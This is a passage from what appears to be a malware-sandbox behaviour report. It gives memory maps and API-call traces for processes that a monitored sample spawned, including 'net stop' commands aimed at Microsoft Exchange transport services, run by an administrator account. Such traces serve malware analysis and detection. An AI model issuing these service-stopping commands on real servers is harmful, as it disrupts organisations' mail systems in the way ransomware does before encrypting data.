= 0xa8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000a70000" filename = "" Region: id = 12684 start_va = 0xa90000 end_va = 0xa91fff entry_point = 0x0 region_type = private name = "private_0x0000000000a90000" filename = "" Region: id = 12685 start_va = 0xaa0000 end_va = 0xab3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000aa0000" filename = "" Region: id = 12686 start_va = 0xac0000 end_va = 0xafffff entry_point = 0x0 region_type = private name = "private_0x0000000000ac0000" filename = "" Region: id = 12687 start_va = 0xb00000 end_va = 0xb7ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b00000" filename = "" Region: id = 12688 start_va = 0xb80000 end_va = 0xb83fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b80000" filename = "" Region: id = 12689 start_va = 0xb90000 end_va = 0xb90fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b90000" filename = "" Region: id = 12690 start_va = 0xba0000 end_va = 0xba1fff entry_point = 0x0 region_type = private name = "private_0x0000000000ba0000" filename = "" Region: id = 12691 start_va = 0x1080000 end_va = 0x10b1fff entry_point = 0x1080000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe") Region: id = 12692 start_va = 0x10c0000 end_va = 0x50bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000010c0000" filename = "" Region: id = 12693 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 12694 start_va = 0x7efd0000 end_va = 0x7eff2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efd0000" filename = "" Region: id = 12695 start_va = 0x7eff7000 end_va = 0x7eff7fff entry_point = 0x0 region_type = private name = "private_0x000000007eff7000" filename = "" Region: id = 12696 start_va = 0x7effa000 end_va = 0x7effcfff entry_point = 0x0 region_type = private name = "private_0x000000007effa000" filename = "" Region: id = 12697 start_va = 0x7effd000 end_va = 0x7effdfff entry_point = 0x0 region_type = private name = "private_0x000000007effd000" filename = "" Region: id = 12698 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 12699 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 12700 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 12701 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 12702 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 12703 start_va = 0xbb0000 end_va = 0xbbffff entry_point = 0x0 region_type = private name = "private_0x0000000000bb0000" filename = "" Region: id = 12704 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 12705 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 12706 start_va = 0xc60000 end_va = 0xd5ffff entry_point = 0x0 region_type = private name = "private_0x0000000000c60000" filename = "" Region: id = 12707 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 12708 start_va = 0xa70000 end_va = 0xa7ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a70000" filename = "" Region: id = 12709 start_va = 0xa80000 end_va = 0xa83fff entry_point = 0x0 region_type = private name = "private_0x0000000000a80000" filename = "" Region: id = 12710 start_va = 0xbc0000 end_va = 0xbfffff entry_point = 0x0 region_type = private name = "private_0x0000000000bc0000" filename = "" Region: id = 12711 start_va = 0xd60000 end_va = 0xe1dfff entry_point = 0xd60000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 12712 start_va = 0xe20000 end_va = 0xe9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000e20000" filename = "" Region: id = 12713 start_va = 0x52a0000 end_va = 0x52affff entry_point = 0x0 region_type = private name = "private_0x00000000052a0000" filename = "" Region: id = 12714 start_va = 0x74a00000 end_va = 0x74a2efff entry_point = 0x74a00000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\SysWOW64\\logoncli.dll" (normalized: "c:\\windows\\syswow64\\logoncli.dll") Region: id = 12715 start_va = 0x74a30000 end_va = 0x74a37fff entry_point = 0x74a30000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\SysWOW64\\dsrole.dll" (normalized: "c:\\windows\\syswow64\\dsrole.dll") Region: id = 12716 start_va = 0x74a40000 end_va = 0x74a4efff entry_point = 0x74a40000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\SysWOW64\\browcli.dll" (normalized: "c:\\windows\\syswow64\\browcli.dll") Region: id = 12717 start_va = 0x74a50000 end_va = 0x74a63fff entry_point = 0x74a50000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\SysWOW64\\samcli.dll" (normalized: "c:\\windows\\syswow64\\samcli.dll") Region: id = 12718 start_va = 0x74ac0000 end_va = 0x74ac9fff entry_point = 0x74ac0000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Region: id = 12719 start_va = 0x74ad0000 end_va = 0x74aebfff entry_point = 0x74ad0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 12720 start_va = 0x74af0000 end_va = 0x74b0afff entry_point = 0x74af0000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 12721 start_va = 0x74b10000 end_va = 0x74b1ffff entry_point = 0x74b10000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\SysWOW64\\wkscli.dll" (normalized: "c:\\windows\\syswow64\\wkscli.dll") Region: id = 12722 start_va = 0x74ce0000 end_va = 0x74d38fff entry_point = 0x74ce0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 12723 start_va = 0x74d40000 end_va = 0x74d49fff entry_point = 0x74d40000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 12724 start_va = 0x74d50000 end_va = 0x74d6dfff entry_point = 0x74d50000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 12725 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 12726 start_va = 0x77250000 end_va = 0x77292fff entry_point = 0x77250000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 12727 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 12728 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 12729 start_va = 0x77af0000 end_va = 0x77b9bfff entry_point = 0x77af0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 12730 start_va = 0x7eed0000 end_va = 0x7efcffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007eed0000" filename = "" Region: id = 12731 start_va = 0x7eff4000 end_va = 0x7eff6fff entry_point = 0x0 region_type = private name = "private_0x000000007eff4000" filename = "" Region: id = 12732 start_va = 0xa90000 end_va = 0xa93fff entry_point = 0x0 region_type = private name = "private_0x0000000000a90000" filename = "" Region: id = 12733 start_va = 0xc00000 end_va = 0xc02fff entry_point = 0xc00000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\SysWOW64\\netmsg.dll" (normalized: "c:\\windows\\syswow64\\netmsg.dll") Region: id = 12734 start_va = 0xc10000 end_va = 0xc41fff entry_point = 0xc10000 region_type = mapped_file name = "netmsg.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\netmsg.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\netmsg.dll.mui") Thread: id = 775 os_tid = 0xdc4 [0142.139] GetModuleHandleA (lpModuleName=0x0) returned 0x1080000 [0142.139] __set_app_type (_Type=0x1) [0142.139] __p__fmode () returned 0x77ac4d6c [0142.139] __p__commode () returned 0x77ac5b1c [0142.139] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x1087020) returned 0x0 [0142.139] __getmainargs (in: _Argc=0x109f688, _Argv=0x109f68c, _Env=0x109f690, _DoWildCard=0, _StartInfo=0x109f69c | out: _Argc=0x109f688, _Argv=0x109f68c, _Env=0x109f690) returned 0 [0142.139] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0142.139] GetConsoleOutputCP () returned 0x1b5 [0142.139] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x10a7020 | out: lpCPInfo=0x10a7020) returned 1 [0142.139] SetThreadUILanguage (LangId=0x0) returned 0x409 [0142.141] sprintf_s (in: _DstBuf=0xb7f7f4, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0142.142] setlocale (category=0, locale=".437") returned="English_United States.437" [0142.143] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0142.143] GetStdHandle (nStdHandle=0xfffffff4) returned 0x40 [0142.143] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSExchangeTransport" [0142.143] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xb7f59c, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0142.143] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0xb7f590 | out: Buffer=0xb7f590*=0xc68658) returned 0x0 [0142.143] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0xb7f594 | out: Buffer=0xb7f594*=0xc68640) returned 0x0 [0142.143] __iob_func () returned 0x77ac1208 [0142.143] _fileno (_File=0x77ac1208) returned 0 [0142.143] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0142.143] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0142.143] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0142.143] _wcsicmp (_String1="config", _String2="stop") returned -16 [0142.143] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0142.143] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0142.143] _wcsicmp (_String1="file", _String2="stop") returned -13 [0142.143] _wcsicmp (_String1="files", _String2="stop") returned -13 [0142.143] _wcsicmp (_String1="group", _String2="stop") returned -12 [0142.143] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0142.143] _wcsicmp (_String1="help", _String2="stop") returned -11 [0142.143] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0142.143] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0142.144] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0142.144] _wcsicmp (_String1="session", _String2="stop") returned -15 [0142.144] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0142.144] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0142.144] _wcsicmp (_String1="share", _String2="stop") returned -12 [0142.144] _wcsicmp (_String1="start", _String2="stop") returned -14 [0142.144] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0142.144] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0142.144] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0142.144] _wcsicmp (_String1="accounts", _String2="MSExchangeTransport") returned -12 [0142.144] _wcsicmp (_String1="computer", _String2="MSExchangeTransport") returned -10 [0142.144] _wcsicmp (_String1="config", _String2="MSExchangeTransport") returned -10 [0142.144] _wcsicmp (_String1="continue", _String2="MSExchangeTransport") returned -10 [0142.144] _wcsicmp (_String1="cont", _String2="MSExchangeTransport") returned -10 [0142.144] _wcsicmp (_String1="file", _String2="MSExchangeTransport") returned -7 [0142.144] _wcsicmp (_String1="files", _String2="MSExchangeTransport") returned -7 [0142.144] _wcsicmp (_String1="group", _String2="MSExchangeTransport") returned -6 [0142.144] _wcsicmp (_String1="groups", _String2="MSExchangeTransport") returned -6 [0142.144] _wcsicmp (_String1="help", _String2="MSExchangeTransport") returned -5 [0142.144] _wcsicmp (_String1="helpmsg", _String2="MSExchangeTransport") returned -5 [0142.144] _wcsicmp (_String1="localgroup", _String2="MSExchangeTransport") returned -1 [0142.144] _wcsicmp (_String1="pause", _String2="MSExchangeTransport") returned 3 [0142.144] _wcsicmp (_String1="session", _String2="MSExchangeTransport") returned 6 [0142.144] _wcsicmp (_String1="sessions", _String2="MSExchangeTransport") returned 6 [0142.144] _wcsicmp (_String1="sess", _String2="MSExchangeTransport") returned 6 [0142.144] _wcsicmp (_String1="share", _String2="MSExchangeTransport") returned 6 [0142.144] _wcsicmp (_String1="start", _String2="MSExchangeTransport") returned 6 [0142.144] _wcsicmp (_String1="stats", _String2="MSExchangeTransport") returned 6 [0142.144] _wcsicmp (_String1="statistics", _String2="MSExchangeTransport") returned 6 [0142.144] _wcsicmp (_String1="stop", _String2="MSExchangeTransport") returned 6 [0142.144] _wcsicmp (_String1="time", _String2="MSExchangeTransport") returned 7 [0142.144] _wcsicmp (_String1="user", _String2="MSExchangeTransport") returned 8 [0142.144] _wcsicmp (_String1="users", _String2="MSExchangeTransport") returned 8 [0142.144] _wcsicmp (_String1="msg", _String2="MSExchangeTransport") returned 2 [0142.144] _wcsicmp (_String1="messenger", _String2="MSExchangeTransport") returned -14 [0142.144] _wcsicmp (_String1="receiver", _String2="MSExchangeTransport") returned 5 [0142.144] _wcsicmp (_String1="rcv", _String2="MSExchangeTransport") returned 5 [0142.144] _wcsicmp (_String1="netpopup", _String2="MSExchangeTransport") returned 1 [0142.144] _wcsicmp (_String1="redirector", _String2="MSExchangeTransport") returned 5 [0142.144] _wcsicmp (_String1="redir", _String2="MSExchangeTransport") returned 5 [0142.144] _wcsicmp (_String1="rdr", _String2="MSExchangeTransport") returned 5 [0142.144] _wcsicmp (_String1=0x1081ffc, _String2="MSExchangeTransport") returned 10 [0142.144] _wcsicmp (_String1="work", _String2="MSExchangeTransport") returned 10 [0142.144] _wcsicmp (_String1="wksta", _String2="MSExchangeTransport") returned 10 [0142.144] _wcsicmp (_String1="prdr", _String2="MSExchangeTransport") returned 3 [0142.144] _wcsicmp (_String1="devrdr", _String2="MSExchangeTransport") returned -9 [0142.144] _wcsicmp (_String1="lanmanworkstation", _String2="MSExchangeTransport") returned -1 [0142.144] _wcsicmp (_String1="server", _String2="MSExchangeTransport") returned 6 [0142.144] _wcsicmp (_String1="svr", _String2="MSExchangeTransport") returned 6 [0142.144] _wcsicmp (_String1="srv", _String2="MSExchangeTransport") returned 6 [0142.144] _wcsicmp (_String1="lanmanserver", _String2="MSExchangeTransport") returned -1 [0142.144] _wcsicmp (_String1="alerter", _String2="MSExchangeTransport") returned -12 [0142.144] _wcsicmp (_String1="netlogon", _String2="MSExchangeTransport") returned 1 [0142.145] _wcsupr (in: _String="MSExchangeTransport" | out: _String="MSEXCHANGETRANSPORT") returned="MSEXCHANGETRANSPORT" [0142.145] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0xc62640 [0142.147] GetServiceKeyNameW (in: hSCManager=0xc62640, lpDisplayName="MSEXCHANGETRANSPORT", lpServiceName=0x10a8cb0, lpcchBuffer=0xb7f50c | out: lpServiceName="", lpcchBuffer=0xb7f50c) returned 0 [0142.147] _wcsicmp (_String1="msg", _String2="MSEXCHANGETRANSPORT") returned 2 [0142.147] _wcsicmp (_String1="messenger", _String2="MSEXCHANGETRANSPORT") returned -14 [0142.147] _wcsicmp (_String1="receiver", _String2="MSEXCHANGETRANSPORT") returned 5 [0142.147] _wcsicmp (_String1="rcv", _String2="MSEXCHANGETRANSPORT") returned 5 [0142.147] _wcsicmp (_String1="redirector", _String2="MSEXCHANGETRANSPORT") returned 5 [0142.147] _wcsicmp (_String1="redir", _String2="MSEXCHANGETRANSPORT") returned 5 [0142.147] _wcsicmp (_String1="rdr", _String2="MSEXCHANGETRANSPORT") returned 5 [0142.147] _wcsicmp (_String1="workstation", _String2="MSEXCHANGETRANSPORT") returned 10 [0142.148] _wcsicmp (_String1="work", _String2="MSEXCHANGETRANSPORT") returned 10 [0142.148] _wcsicmp (_String1="wksta", _String2="MSEXCHANGETRANSPORT") returned 10 [0142.148] _wcsicmp (_String1="prdr", _String2="MSEXCHANGETRANSPORT") returned 3 [0142.148] _wcsicmp (_String1="devrdr", _String2="MSEXCHANGETRANSPORT") returned -9 [0142.148] _wcsicmp (_String1="lanmanworkstation", _String2="MSEXCHANGETRANSPORT") returned -1 [0142.148] _wcsicmp (_String1="server", _String2="MSEXCHANGETRANSPORT") returned 6 [0142.148] _wcsicmp (_String1="svr", _String2="MSEXCHANGETRANSPORT") returned 6 [0142.148] _wcsicmp (_String1="srv", _String2="MSEXCHANGETRANSPORT") returned 6 [0142.148] _wcsicmp (_String1="lanmanserver", _String2="MSEXCHANGETRANSPORT") returned -1 [0142.148] _wcsicmp (_String1="alerter", _String2="MSEXCHANGETRANSPORT") returned -12 [0142.148] _wcsicmp (_String1="netlogon", _String2="MSEXCHANGETRANSPORT") returned 1 [0142.148] _wcsicmp (_String1="MSEXCHANGETRANSPORT", _String2="WORKSTATION") returned -10 [0142.148] _wcsicmp (_String1="MSEXCHANGETRANSPORT", _String2="LanmanWorkstation") returned 1 [0142.148] _wcsicmp (_String1="MSEXCHANGETRANSPORT", _String2="SERVER") returned -6 [0142.148] _wcsicmp (_String1="MSEXCHANGETRANSPORT", _String2="LanmanServer") returned 1 [0142.148] _wcsicmp (_String1="MSEXCHANGETRANSPORT", _String2="BROWSER") returned 11 [0142.148] _wcsicmp (_String1="MSEXCHANGETRANSPORT", _String2="BROWSER") returned 11 [0142.148] _wcsicmp (_String1="MSEXCHANGETRANSPORT", _String2="MESSENGER") returned 14 [0142.148] _wcsicmp (_String1="MSEXCHANGETRANSPORT", _String2="MESSENGER") returned 14 [0142.148] _wcsicmp (_String1="MSEXCHANGETRANSPORT", _String2="NETRUN") returned -1 [0142.148] _wcsicmp (_String1="MSEXCHANGETRANSPORT", _String2="NETRUN") returned -1 [0142.148] _wcsicmp (_String1="MSEXCHANGETRANSPORT", _String2="SPOOLER") returned -6 [0142.148] _wcsicmp (_String1="MSEXCHANGETRANSPORT", _String2="SPOOLER") returned -6 [0142.148] _wcsicmp (_String1="MSEXCHANGETRANSPORT", _String2="ALERTER") returned 12 [0142.148] _wcsicmp (_String1="MSEXCHANGETRANSPORT", _String2="ALERTER") returned 12 [0142.148] _wcsicmp (_String1="MSEXCHANGETRANSPORT", _String2="NETLOGON") returned -1 [0142.148] _wcsicmp (_String1="MSEXCHANGETRANSPORT", _String2="NETLOGON") returned -1 [0142.148] _wcsicmp (_String1="MSEXCHANGETRANSPORT", _String2="NETPOPUP") returned -1 [0142.148] _wcsicmp (_String1="MSEXCHANGETRANSPORT", _String2="NETPOPUP") returned -1 [0142.148] _wcsicmp (_String1="MSEXCHANGETRANSPORT", _String2="SQLSERVER") returned -6 [0142.148] _wcsicmp (_String1="MSEXCHANGETRANSPORT", _String2="SQLSERVER") returned -6 [0142.148] _wcsicmp (_String1="MSEXCHANGETRANSPORT", _String2="REPLICATOR") returned -5 [0142.148] _wcsicmp (_String1="MSEXCHANGETRANSPORT", _String2="REPLICATOR") returned -5 [0142.148] _wcsicmp (_String1="MSEXCHANGETRANSPORT", _String2="REMOTEBOOT") returned -5 [0142.148] _wcsicmp (_String1="MSEXCHANGETRANSPORT", _String2="REMOTEBOOT") returned -5 [0142.148] _wcsicmp (_String1="MSEXCHANGETRANSPORT", _String2="TIMESOURCE") returned -7 [0142.148] _wcsicmp (_String1="MSEXCHANGETRANSPORT", _String2="TIMESOURCE") returned -7 [0142.148] _wcsicmp (_String1="MSEXCHANGETRANSPORT", _String2="AFP") returned 12 [0142.148] _wcsicmp (_String1="MSEXCHANGETRANSPORT", _String2="AFP") returned 12 [0142.148] _wcsicmp (_String1="MSEXCHANGETRANSPORT", _String2="UPS") returned -8 [0142.148] _wcsicmp (_String1="MSEXCHANGETRANSPORT", _String2="UPS") returned -8 [0142.148] _wcsicmp (_String1="MSEXCHANGETRANSPORT", _String2="XACTSRV") returned -11 [0142.148] _wcsicmp (_String1="MSEXCHANGETRANSPORT", _String2="XACTSRV") returned -11 [0142.149] _wcsicmp (_String1="MSEXCHANGETRANSPORT", _String2="TCPIP") returned -7 [0142.149] _wcsicmp (_String1="MSEXCHANGETRANSPORT", _String2="TCPIP") returned -7 [0142.149] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0xc63770 [0142.149] OpenServiceW (hSCManager=0xc63770, lpServiceName="MSEXCHANGETRANSPORT", dwDesiredAccess=0x84) returned 0x0 [0142.149] GetLastError () returned 0x424 [0142.149] CloseServiceHandle (hSCObject=0xc63770) returned 1 [0142.149] wcscpy_s (in: _Destination=0x10a7698, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0142.149] LoadLibraryW (lpLibFileName="NETMSG") returned 0xc00000 [0142.150] FormatMessageW (in: dwFlags=0x2a00, lpSource=0xc00000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x10a7ca8, nSize=0x800, Arguments=0x10a7450 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0142.151] GetFileType (hFile=0x40) returned 0x2 [0142.151] GetConsoleMode (in: hConsoleHandle=0x40, lpMode=0xb7f3a8 | out: lpMode=0xb7f3a8) returned 1 [0142.151] WriteConsoleW (in: hConsoleOutput=0x40, lpBuffer=0x10a7ca8*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0xb7f3b4, lpReserved=0x0 | out: lpBuffer=0x10a7ca8*, lpNumberOfCharsWritten=0xb7f3b4*=0x1e) returned 1 [0142.151] GetFileType (hFile=0x40) returned 0x2 [0142.151] GetConsoleMode (in: hConsoleHandle=0x40, lpMode=0xb7f3a8 | out: lpMode=0xb7f3a8) returned 1 [0142.152] WriteConsoleW (in: hConsoleOutput=0x40, lpBuffer=0x1081250*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xb7f3b4, lpReserved=0x0 | out: lpBuffer=0x1081250*, lpNumberOfCharsWritten=0xb7f3b4*=0x2) returned 1 [0142.152] _ultow (in: _Dest=0x889, _Radix=12055496 | out: _Dest=0x889) returned="2185" [0142.152] FormatMessageW (in: dwFlags=0x2800, lpSource=0xc00000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x10a7ca8, nSize=0x800, Arguments=0x10a7450 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0142.152] GetFileType (hFile=0x40) returned 0x2 [0142.152] GetConsoleMode (in: hConsoleHandle=0x40, lpMode=0xb7f398 | out: lpMode=0xb7f398) returned 1 [0142.152] WriteConsoleW (in: hConsoleOutput=0x40, lpBuffer=0x10a7ca8*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0xb7f3a4, lpReserved=0x0 | out: lpBuffer=0x10a7ca8*, lpNumberOfCharsWritten=0xb7f3a4*=0x34) returned 1 [0142.152] GetFileType (hFile=0x40) returned 0x2 [0142.152] GetConsoleMode (in: hConsoleHandle=0x40, lpMode=0xb7f398 | out: lpMode=0xb7f398) returned 1 [0142.153] WriteConsoleW (in: hConsoleOutput=0x40, lpBuffer=0x1081250*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xb7f3a4, lpReserved=0x0 | out: lpBuffer=0x1081250*, lpNumberOfCharsWritten=0xb7f3a4*=0x2) returned 1 [0142.153] NetApiBufferFree (Buffer=0xc68658) returned 0x0 [0142.153] NetApiBufferFree (Buffer=0xc68640) returned 0x0 [0142.153] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSExchangeTransport" [0142.153] exit (_Code=2) Thread: id = 776 os_tid = 0xdbc Process: id = "269" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x1644f000" os_pid = "0xbf4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb54" cmd_line = "/c net stop MSExchangeTransportLogSearch" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 12735 start_va = 0x3c0000 end_va = 0x40ffff entry_point = 0x3c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 12736 start_va = 0x7d0000 end_va = 0x47cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007d0000" filename = "" Region: id = 12737 start_va = 0x47d0000 end_va = 0x47effff entry_point = 0x0 region_type = private name = "private_0x00000000047d0000" filename = "" Region: id = 12738 start_va = 0x47f0000 end_va = 0x47f0fff entry_point = 0x0 region_type = private name = "private_0x00000000047f0000" filename = "" Region: id = 12739 start_va = 0x4800000 end_va = 0x4813fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004800000" filename = "" Region: id = 12740 start_va = 0x4820000 end_va = 0x485ffff entry_point = 0x0 region_type = private name = "private_0x0000000004820000" filename = "" Region: id = 12741 start_va = 0x4860000 end_va = 0x495ffff entry_point = 0x0 region_type = private name = "private_0x0000000004860000" filename = "" Region: id = 12742 start_va = 0x4960000 end_va = 0x4963fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004960000" filename = "" Region: id = 12743 start_va = 0x4970000 end_va = 0x4970fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004970000" filename = "" Region: id = 12744 start_va = 0x4980000 end_va = 0x4981fff entry_point = 0x0 region_type = private name = "private_0x0000000004980000" filename = "" Region: id = 12745 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 12746 start_va = 0x7f060000 end_va = 0x7f082fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f060000" filename = "" Region: id = 12747 start_va = 0x7f084000 end_va = 0x7f084fff entry_point = 0x0 region_type = private name = "private_0x000000007f084000" filename = "" Region: id = 12748 start_va = 0x7f088000 end_va = 0x7f088fff entry_point = 0x0 region_type = private name = "private_0x000000007f088000" filename = "" Region: id = 12749 start_va = 0x7f08d000 end_va = 0x7f08ffff entry_point = 0x0 region_type = private name = "private_0x000000007f08d000" filename = "" Region: id = 12750 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 12751 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 12752 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 12753 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: 